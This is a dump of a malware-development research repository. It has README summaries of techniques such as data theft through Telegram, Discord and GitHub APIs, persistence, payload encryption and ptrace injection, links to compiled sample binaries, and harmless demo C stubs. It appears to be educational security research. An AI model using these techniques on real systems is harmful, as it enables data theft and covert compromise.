https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-05-12-malware-cryptography-27/hack.exe -------------------------------------------------------------------------------- /2024-05-12-malware-cryptography-27/test.txt: -------------------------------------------------------------------------------- 1 | Hello world! Meow-meow!! Meow-meow!! =^..^= 2 | -------------------------------------------------------------------------------- /2024-06-01-malware-cryptography-28/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 28. Simple Nim example 2 | 3 | Malware and Cryptography 28: RC4 payload encryption. Simple Nim example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/06/01/malware-cryptography-28.html](https://cocomelonc.github.io/malware/2024/06/01/malware-cryptography-28.html) -------------------------------------------------------------------------------- /2024-06-01-malware-cryptography-28/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-06-01-malware-cryptography-28/hack.exe -------------------------------------------------------------------------------- /2024-06-01-malware-cryptography-28/hack1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-06-01-malware-cryptography-28/hack1.exe -------------------------------------------------------------------------------- /2024-06-01-malware-cryptography-28/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-06-01-malware-cryptography-28/hack2.exe 
-------------------------------------------------------------------------------- /2024-06-12-malware-trick-39/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-06-12-malware-trick-39/hack.exe -------------------------------------------------------------------------------- /2024-06-16-malware-trick-40/README.md: -------------------------------------------------------------------------------- 1 | # Malware development trick 40. Simple C example 2 | 3 | Malware development trick - part 40. Stealing data via legit Telegram API. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/06/16/malware-trick-40.html](https://cocomelonc.github.io/malware/2024/06/16/malware-trick-40.html) -------------------------------------------------------------------------------- /2024-06-16-malware-trick-40/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-06-16-malware-trick-40/hack.exe -------------------------------------------------------------------------------- /2024-06-20-linux-kernel-hacking-1/Makefile: -------------------------------------------------------------------------------- 1 | obj-m += hack.o 2 | 3 | all: 4 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 5 | 6 | clean: 7 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 8 | -------------------------------------------------------------------------------- /2024-06-20-linux-kernel-hacking-1/README.md: -------------------------------------------------------------------------------- 1 | # Linux malware development 1. Simple C example 2 | Linux malware development - part 1. Introduction to linux kernel hacking. Simple C example. 
3 | 4 | [https://cocomelonc.github.io/linux/2024/06/20/kernel-hacking-1.html](https://cocomelonc.github.io/linux/2024/06/20/kernel-hacking-1.html) -------------------------------------------------------------------------------- /2024-06-20-linux-kernel-hacking-1/hack.c: -------------------------------------------------------------------------------- 1 | /* 2 | * hack.c 3 | * introduction to linux kernel hacking 4 | * author @cocomelonc 5 | * https://cocomelonc.github.io/linux/2024/06/20/kernel-hacking-1.html 6 | */ 7 | #include 8 | #include 9 | #include 10 | 11 | MODULE_LICENSE("GPL"); 12 | MODULE_AUTHOR("cocomelonc"); 13 | MODULE_DESCRIPTION("kernel-test-01"); 14 | MODULE_VERSION("0.001"); 15 | 16 | static int __init hack_init(void) { 17 | printk(KERN_INFO "Meow-meow!\n"); 18 | return 0; 19 | } 20 | 21 | static void __exit hack_exit(void) { 22 | printk(KERN_INFO "Meow-bow!\n"); 23 | } 24 | 25 | module_init(hack_init); 26 | module_exit(hack_exit); 27 | -------------------------------------------------------------------------------- /2024-06-25-malware-trick-41/README.md: -------------------------------------------------------------------------------- 1 | # Malware development trick 41. Simple C example 2 | 3 | Malware development trick - part 41. Stealing data via legit VirusTotal API. Simple C example. 
4 | 5 | [https://cocomelonc.github.io/malware/2024/06/25/malware-trick-41.html](https://cocomelonc.github.io/malware/2024/06/25/malware-trick-41.html) -------------------------------------------------------------------------------- /2024-06-25-malware-trick-41/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-06-25-malware-trick-41/hack.exe -------------------------------------------------------------------------------- /2024-06-25-malware-trick-41/meow.c: -------------------------------------------------------------------------------- 1 | /* 2 | * hack.c 3 | * "malware" for testing VirusTotal API 4 | * author: @cocomelonc 5 | * https://cocomelonc.github.io/malware/2024/06/25/malware-trick-41.html 6 | */ 7 | #include 8 | 9 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 10 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 11 | return 0; 12 | } 13 | -------------------------------------------------------------------------------- /2024-06-25-malware-trick-41/meow.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-06-25-malware-trick-41/meow.exe -------------------------------------------------------------------------------- /2024-06-28-malware-trick-42/README.md: -------------------------------------------------------------------------------- 1 | # Malware development trick 42. Simple C example 2 | 3 | Malware development trick - part 42. Stealing data via legit Discord Bot API. Simple C example. 
4 | 5 | [https://cocomelonc.github.io/malware/2024/06/28/malware-trick-42.html](https://cocomelonc.github.io/malware/2024/06/28/malware-trick-42.html) -------------------------------------------------------------------------------- /2024-06-28-malware-trick-42/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-06-28-malware-trick-42/hack.exe -------------------------------------------------------------------------------- /2024-07-08-malware-pers-25/README.md: -------------------------------------------------------------------------------- 1 | # Malware persistence 25. Simple C example 2 | 3 | Malware persistence - part 25. Create symbolic link from evil to legit. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/07/08/malware-pers-25.html](https://cocomelonc.github.io/malware/2024/07/08/malware-pers-25.html) -------------------------------------------------------------------------------- /2024-07-08-malware-pers-25/hack.c: -------------------------------------------------------------------------------- 1 | /* 2 | * hack.c 3 | * "malware" for symbolic link 4 | * persistence trick 5 | * author: @cocomelonc 6 | * https://cocomelonc.github.io/malware/2024/07/08/malware-pers-25.html 7 | */ 8 | #include 9 | 10 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 11 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /2024-07-08-malware-pers-25/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-07-08-malware-pers-25/hack.exe -------------------------------------------------------------------------------- 
/2024-07-08-malware-pers-25/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-07-08-malware-pers-25/pers.exe -------------------------------------------------------------------------------- /2024-07-16-malware-cryptography-29/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 29. Simple C example 2 | 3 | Malware and Cryptography 29: LOKI payload encryption. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/07/16/malware-cryptography-29.html](https://cocomelonc.github.io/malware/2024/07/16/malware-cryptography-29.html) -------------------------------------------------------------------------------- /2024-07-16-malware-cryptography-29/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-07-16-malware-cryptography-29/hack.exe -------------------------------------------------------------------------------- /2024-07-21-malware-cryptography-30/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 30. Simple C example 2 | 3 | Malware and Cryptography 30: Khufu payload encryption. Simple C example. 
4 | 5 | [https://cocomelonc.github.io/malware/2024/07/21/malware-cryptography-30.html](https://cocomelonc.github.io/malware/2024/07/21/malware-cryptography-30.html) -------------------------------------------------------------------------------- /2024-07-21-malware-cryptography-30/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-07-21-malware-cryptography-30/hack.exe -------------------------------------------------------------------------------- /2024-07-29-malware-cryptography-31/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 31. Simple C example 2 | 3 | Malware and Cryptography 31: CAST-128 payload encryption. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/07/29/malware-cryptography-31.html](https://cocomelonc.github.io/malware/2024/07/29/malware-cryptography-31.html) -------------------------------------------------------------------------------- /2024-07-29-malware-cryptography-31/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-07-29-malware-cryptography-31/hack.exe -------------------------------------------------------------------------------- /2024-07-29-malware-cryptography-31/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-07-29-malware-cryptography-31/hack2.exe -------------------------------------------------------------------------------- /2024-07-29-malware-cryptography-31/hack3.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-07-29-malware-cryptography-31/hack3.exe -------------------------------------------------------------------------------- /2024-08-14-malware-pers-26/README.md: -------------------------------------------------------------------------------- 1 | # Malware persistence 26. Simple C example 2 | 3 | Malware persistence - part 26. Microsoft Edge - part 1. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/08/14/malware-pers-26.html](https://cocomelonc.github.io/malware/2024/08/14/malware-pers-26.html) -------------------------------------------------------------------------------- /2024-08-14-malware-pers-26/hack.c: -------------------------------------------------------------------------------- 1 | /* 2 | * hack.c 3 | * "malware" for Microsoft Edge 4 | * persistence trick 5 | * author: @cocomelonc 6 | * https://cocomelonc.github.io/malware/2024/08/14/malware-pers-26.html 7 | */ 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 12 | switch (nReason) { 13 | case DLL_PROCESS_ATTACH: 14 | MessageBoxA(NULL, "Meow-meow!!", "=^..^=", MB_OK); 15 | break; 16 | case DLL_PROCESS_DETACH: 17 | break; 18 | case DLL_THREAD_ATTACH: 19 | break; 20 | case DLL_THREAD_DETACH: 21 | break; 22 | } 23 | return TRUE; 24 | } -------------------------------------------------------------------------------- /2024-08-14-malware-pers-26/hack.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-08-14-malware-pers-26/hack.dll -------------------------------------------------------------------------------- /2024-08-14-malware-pers-26/pers.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-08-14-malware-pers-26/pers.exe -------------------------------------------------------------------------------- /2024-09-12-malware-cryptography-32/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 32. Simple C example 2 | 3 | Malware and Cryptography 32: FEAL-8 payload encryption. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/09/12/malware-cryptography-32.html](https://cocomelonc.github.io/malware/2024/09/12/malware-cryptography-32.html) -------------------------------------------------------------------------------- /2024-09-12-malware-cryptography-32/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-12-malware-cryptography-32/hack.exe -------------------------------------------------------------------------------- /2024-09-16-linux-hacking-2/README.md: -------------------------------------------------------------------------------- 1 | # Linux malware development 2. Simple C example 2 | Linux malware development - part 2. Find process ID by name. Simple C example. 
3 | 4 | [https://cocomelonc.github.io/linux/2024/09/16/linux-hacking-2.html](https://cocomelonc.github.io/linux/2024/09/16/linux-hacking-2.html) -------------------------------------------------------------------------------- /2024-09-16-linux-hacking-2/hack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-16-linux-hacking-2/hack -------------------------------------------------------------------------------- /2024-09-16-linux-hacking-2/hack2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-16-linux-hacking-2/hack2 -------------------------------------------------------------------------------- /2024-09-16-linux-hacking-2/hack3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-16-linux-hacking-2/hack3 -------------------------------------------------------------------------------- /2024-09-30-malware-trick-43/README.md: -------------------------------------------------------------------------------- 1 | # Malware development trick 43. Simple C example 2 | 3 | Malware development trick - part 43. Shuffle malicious payload. Simple C example. 
4 | 5 | [https://cocomelonc.github.io/malware/2024/09/30/malware-trick-43.html](https://cocomelonc.github.io/malware/2024/09/30/malware-trick-43.html) -------------------------------------------------------------------------------- /2024-09-30-malware-trick-43/bin2data.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | 3 | ## encrypting 4 | def bin2data(data): 5 | # data = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in data) + ' };' 6 | data = '{ 0x' + ', 0x'.join(hex(x)[2:] for x in data) + ' };' 7 | print (data) 8 | return data 9 | 10 | if __name__ == "__main__": 11 | # key for encrypt/decrypt 12 | parser = argparse.ArgumentParser() 13 | parser.add_argument('-f','--file', required = True, help = "target file") 14 | args = vars(parser.parse_args()) 15 | target_file = args['file'] 16 | with open(target_file, 'rb') as f: 17 | data = f.read() 18 | if data: 19 | bin2data(data) 20 | -------------------------------------------------------------------------------- /2024-09-30-malware-trick-43/deshuffled.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-30-malware-trick-43/deshuffled.bin -------------------------------------------------------------------------------- /2024-09-30-malware-trick-43/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-30-malware-trick-43/hack.exe -------------------------------------------------------------------------------- /2024-09-30-malware-trick-43/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-30-malware-trick-43/hack2.exe 
-------------------------------------------------------------------------------- /2024-09-30-malware-trick-43/hack3.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-30-malware-trick-43/hack3.exe -------------------------------------------------------------------------------- /2024-09-30-malware-trick-43/meow.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-30-malware-trick-43/meow.bin -------------------------------------------------------------------------------- /2024-09-30-malware-trick-43/shuffled.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-09-30-malware-trick-43/shuffled.bin -------------------------------------------------------------------------------- /2024-10-20-malware-cryptography-33/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 33. Simple C example 2 | 3 | Malware and Cryptography 33: Lucifer payload encryption. Simple C example. 
4 | 5 | [https://cocomelonc.github.io/malware/2024/10/20/malware-cryptography-33.html](https://cocomelonc.github.io/malware/2024/10/20/malware-cryptography-33.html) -------------------------------------------------------------------------------- /2024-10-20-malware-cryptography-33/hack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-10-20-malware-cryptography-33/hack -------------------------------------------------------------------------------- /2024-10-20-malware-cryptography-33/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-10-20-malware-cryptography-33/hack2.exe -------------------------------------------------------------------------------- /2024-11-10-malware-cryptography-34/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 34. Simple C example 2 | 3 | Malware and Cryptography 34: Encrypt/decrypt payload via DFC (Decorrelated Fast Cipher) algorithm. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/11/10/malware-cryptography-34.html](https://cocomelonc.github.io/malware/2024/11/10/malware-cryptography-34.html) -------------------------------------------------------------------------------- /2024-11-10-malware-cryptography-34/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-11-10-malware-cryptography-34/hack.exe -------------------------------------------------------------------------------- /2024-11-22-linux-hacking-3/README.md: -------------------------------------------------------------------------------- 1 | # Linux malware development 3. 
Simple C example 2 | Linux malware development - part 3. Process injection via ptrace. Simple C example. 3 | 4 | [https://cocomelonc.github.io/malware/2024/11/22/linux-hacking-3.html](https://cocomelonc.github.io/malware/2024/11/22/linux-hacking-3.html) -------------------------------------------------------------------------------- /2024-11-22-linux-hacking-3/hack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-11-22-linux-hacking-3/hack -------------------------------------------------------------------------------- /2024-11-22-linux-hacking-3/meow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-11-22-linux-hacking-3/meow -------------------------------------------------------------------------------- /2024-11-22-linux-hacking-3/meow.c: -------------------------------------------------------------------------------- 1 | /* 2 | * meow.c 3 | * simple "victim" process for injection testing 4 | * author @cocomelonc 5 | * https://cocomelonc.github.io/malware/2024/11/22/linux-hacking-3.html 6 | */ 7 | 8 | #include 9 | #include 10 | #include 11 | 12 | int main() { 13 | printf("victim process started. PID: %d\n", getpid()); 14 | 15 | while (1) { 16 | printf("meow-meow... PID: %d\n", getpid()); 17 | sleep(5); // simulate periodic activity 18 | } 19 | 20 | return 0; 21 | } 22 | -------------------------------------------------------------------------------- /2024-11-30-malware-cryptography-35/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 35. Simple C example 2 | 3 | Malware and Cryptography 35: Encrypt/decrypt payload via Treyfer algorithm. Simple C example. 
4 | 5 | [https://cocomelonc.github.io/malware/2024/11/30/malware-cryptography-35.html](https://cocomelonc.github.io/malware/2024/11/30/malware-cryptography-35.html) -------------------------------------------------------------------------------- /2024-11-30-malware-cryptography-35/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-11-30-malware-cryptography-35/hack.exe -------------------------------------------------------------------------------- /2024-12-16-malware-cryptography-36/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 36. Simple C example 2 | 3 | Malware and cryptography 36 - random sbox generation algorithms: Fisher-Yates shuffle. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/12/16/malware-cryptography-36.html](https://cocomelonc.github.io/malware/2024/12/16/malware-cryptography-36.html) -------------------------------------------------------------------------------- /2024-12-16-malware-cryptography-36/hack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-12-16-malware-cryptography-36/hack -------------------------------------------------------------------------------- /2024-12-16-malware-cryptography-36/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-12-16-malware-cryptography-36/hack2.exe -------------------------------------------------------------------------------- /2024-12-16-malware-cryptography-36/hack3: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-12-16-malware-cryptography-36/hack3 -------------------------------------------------------------------------------- /2024-12-16-malware-cryptography-36/hack4.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-12-16-malware-cryptography-36/hack4.exe -------------------------------------------------------------------------------- /2024-12-23-malware-cryptography-37/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography 37. Simple C example 2 | 3 | Malware and cryptography 37 - Nonlinearity. Walsh Transform. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/12/23/malware-cryptography-37.html](https://cocomelonc.github.io/malware/2024/12/23/malware-cryptography-37.html) -------------------------------------------------------------------------------- /2024-12-23-malware-cryptography-37/hack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-12-23-malware-cryptography-37/hack -------------------------------------------------------------------------------- /2024-12-29-malware-cryptography-38/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-12-29-malware-cryptography-38/hack.exe -------------------------------------------------------------------------------- /2025-01-16-malware-cryptography-39/hack.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-01-16-malware-cryptography-39/hack.exe -------------------------------------------------------------------------------- /2025-01-19-malware-tricks-44/README.md: -------------------------------------------------------------------------------- 1 | # Malware development trick 44. Simple C example 2 | 3 | Malware development trick - part 44. Using legit GitHub API. Simple C example. 4 | 5 | [https://cocomelonc.github.io/malware/2025/01/19/malware-tricks-44.html](https://cocomelonc.github.io/malware/2025/01/19/malware-tricks-44.html) -------------------------------------------------------------------------------- /2025-01-19-malware-tricks-44/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-01-19-malware-tricks-44/hack.exe -------------------------------------------------------------------------------- /2025-02-01-linux-hacking-4/hack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-02-01-linux-hacking-4/hack -------------------------------------------------------------------------------- /2025-02-24-malware-trick-45/cat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-02-24-malware-trick-45/cat.png -------------------------------------------------------------------------------- /2025-02-24-malware-trick-45/hack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-02-24-malware-trick-45/hack 
--------------------------------------------------------------------------------
/2025-02-24-malware-trick-45/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-02-24-malware-trick-45/hack.exe
--------------------------------------------------------------------------------
/2025-02-24-malware-trick-45/stego.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-02-24-malware-trick-45/stego.png
--------------------------------------------------------------------------------
/2025-03-12-malware-pers-27/hack.c:
--------------------------------------------------------------------------------
/*
 * hack.c
 * "malware" for Scheduled Task
 * persistence trick
 * author: @cocomelonc
 * https://cocomelonc.github.io/malware/2025/03/12/malware-pers-27.html
 */
/* header names were lost in extraction; restored here: stdio.h is
   required by fopen/fprintf/fclose, windows.h is assumed (not used
   by the code below) */
#include <windows.h>
#include <stdio.h>

int main() {
  /* harmless marker: the payload only writes a text file, so the
     analyst can confirm the scheduled task actually ran */
  FILE *file = fopen("C:\\Users\\zhzhu\\Desktop\\meow.txt", "w");
  if (file) {
    fprintf(file, "=^..^= Meow-meow =^..^=!!\n");
    fclose(file);
  }
  return 0;
}
--------------------------------------------------------------------------------
/2025-03-12-malware-pers-27/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-03-12-malware-pers-27/hack.exe
--------------------------------------------------------------------------------
/2025-03-12-malware-pers-27/pers.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-03-12-malware-pers-27/pers.exe
--------------------------------------------------------------------------------
/2025-04-02-malware-cryptography-40/README.md:
--------------------------------------------------------------------------------
# Malware and cryptography 40. Simple Nim example

Malware and cryptography - part 40. Encrypt/decrypt payload via RC5. Simple Nim example.

[https://cocomelonc.github.io/malware/2025/04/02/malware-cryptography-40.html](https://cocomelonc.github.io/malware/2025/04/02/malware-cryptography-40.html)
--------------------------------------------------------------------------------
/2025-04-02-malware-cryptography-40/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-04-02-malware-cryptography-40/hack.exe
--------------------------------------------------------------------------------
/2025-04-10-malware-cryptography-41/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-04-10-malware-cryptography-41/hack.exe
--------------------------------------------------------------------------------
/2025-05-01-malware-tricks-46/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-05-01-malware-tricks-46/hack.exe
--------------------------------------------------------------------------------
/2025-05-10-malware-tricks-47/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-05-10-malware-tricks-47/hack.exe
--------------------------------------------------------------------------------
/2025-05-10-malware-tricks-47/hack2.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-05-10-malware-tricks-47/hack2.exe
--------------------------------------------------------------------------------
/2025-05-10-malware-tricks-47/hack3.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-05-10-malware-tricks-47/hack3.exe
--------------------------------------------------------------------------------
/2025-05-29-malware-cryptography-42/hack:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-05-29-malware-cryptography-42/hack
--------------------------------------------------------------------------------
/2025-05-29-malware-cryptography-42/hack2.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-05-29-malware-cryptography-42/hack2.exe
--------------------------------------------------------------------------------
/2025-05-29-malware-cryptography-42/hack3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2025-05-29-malware-cryptography-42/hack3
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Meow-meow

Results (ALL, even bad and unfinished ones) of my research on cybersecurity practical cases

![meow](./meow.png?raw=true)

[https://cocomelonc.github.io/](https://cocomelonc.github.io/)

My MD MZ book: [https://cocomelonc.github.io/book/2022/07/16/mybook.html](https://cocomelonc.github.io/book/2022/07/16/mybook.html)
My Malware in the wild book: [https://cocomelonc.github.io/book/2023/12/13/malwild-book.html](https://cocomelonc.github.io/book/2023/12/13/malwild-book.html)
Malware Development for Ethical Hackers by Packt book: [https://github.com/PacktPublishing/Malware-Development-for-Ethical-Hackers/](https://github.com/PacktPublishing/Malware-Development-for-Ethical-Hackers/)

--------------------------------------------------------------------------------
/hvck/2022-12-01-malware-analysis-online/2022-02-23_14-48.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2022-12-01-malware-analysis-online/2022-02-23_14-48.png
--------------------------------------------------------------------------------
/hvck/2022-12-01-malware-analysis-online/README.md:
--------------------------------------------------------------------------------
# malware analysis: online tools

Using VirusTotal and Malshare APIs

![meow](./2022-02-23_14-48.png?raw=true)

--------------------------------------------------------------------------------
/hvck/2022-12-01-malware-analysis-online/locker.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2022-12-01-malware-analysis-online/locker.exe
--------------------------------------------------------------------------------
/hvck/2022-12-01-malware-analysis-online/shell.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2022-12-01-malware-analysis-online/shell.exe
--------------------------------------------------------------------------------
/hvck/2023-01-01-rf-wifi/README.md:
--------------------------------------------------------------------------------
# hack epson

Pwn my vulnerable epson printer

![meow](./photo_2023-01-04_15-55-20.jpg?raw=true)

--------------------------------------------------------------------------------
/hvck/2023-01-01-rf-wifi/photo_2023-01-04_15-55-20.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2023-01-01-rf-wifi/photo_2023-01-04_15-55-20.jpg
--------------------------------------------------------------------------------
/hvck/2023-01-12-zte-crack/2023-01-15_05-56.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/hvck/2023-01-12-zte-crack/2023-01-15_05-56.png
--------------------------------------------------------------------------------
/hvck/2023-01-12-zte-crack/README.md:
